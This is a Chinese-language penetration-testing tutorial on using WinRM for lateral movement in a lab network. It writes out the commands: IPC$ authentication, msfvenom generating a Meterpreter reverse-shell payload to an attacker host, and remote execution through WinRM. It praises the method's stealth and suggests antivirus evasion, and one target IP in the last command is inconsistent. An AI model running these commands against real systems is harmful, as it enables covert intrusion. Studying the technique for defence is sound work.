0x00:前言
WinRM是WindowsRemoteManagementd(win遠程管理)的簡稱。基於Web服務管理(WS-Management)標準,使用80埠或者443埠。這樣一來,我們就可以在對方有設置防火牆的情況下遠程管理這臺伺服器了。
Server2008R2及往上的系統中默認中都開啟該服務,從Server2012系統後開始,該WinRM服務便被設置為默認開啟。Win7系統中卻默認安裝此WinRM服務,但是默認為禁用狀態,Win8系統和Win10系統也都默認開啟WinRM服務。
WinRM的好處在於,這種遠程連接不容易被察覺到,也不會佔用遠程連接數!
0x01:環境準備
WinRM會用到5985、5986 埠,所以防火牆必須做開放處理。用Administrator帳戶登錄攻擊機器前提知道被攻擊方的用戶登錄帳戶密碼Windows作業系統中,默認是開啟共享IPC$的IP:192.168.124.30(server2016)IP:192.168.124.20(win7)
IP:192.168.124.32(Kali)
0x02:攻擊過程
一、快速在(server2016)運行winrm
命令:winrmquickconfig
二、netuse連接(win7)
命令:netuse \\192.168.124.20\ipc$ 「密碼」/user:「用戶名
嘗試調用本地」calc.exe」.
成功
三、在(win7)中需要被遠程訪問的文件,開啟文件共享。
開啟共享文件夾,並添加訪問用戶的權限,使其能夠遠程訪問。
四、在(win7)中放置木馬,並且用(kali)接收反彈的shell
1、生成shellcode
msfvenom -pwindows/x64/meterpreter_reverse_tcp lhost=192.168.124.32 lport=7777-f exe -o ./luomiweixiong.exe
2、把」luomiweixiong.exe」放在(win7)的C盤根目錄。
3、kali啟動監聽shell模式
五、利用(server2016)的WinRM 實現內網無文件攻擊反彈shell
1、在(server2016)中執行以下命令
winrm invoke create wmicimv2/win32_process @{commandline="\\192.168.12.20\c\luomiweixiong.exe"}
反彈成功
0x03:視頻演示
因視頻無法上傳,有需要的可以留言或私信獲取哦
0x04:總結
shellcode還可以做一些免殺處理,使其更加的完美。(有待大佬們再次總結)
0x05:實操推薦(免費學習)
Kali之內網滲透:通過本實驗課學習到通過Kali如何破解WIFI密碼,利用Metasploit這個強大的滲透測試框架進行內網滲透。
搜索前往合天網安實驗室開始做實驗哦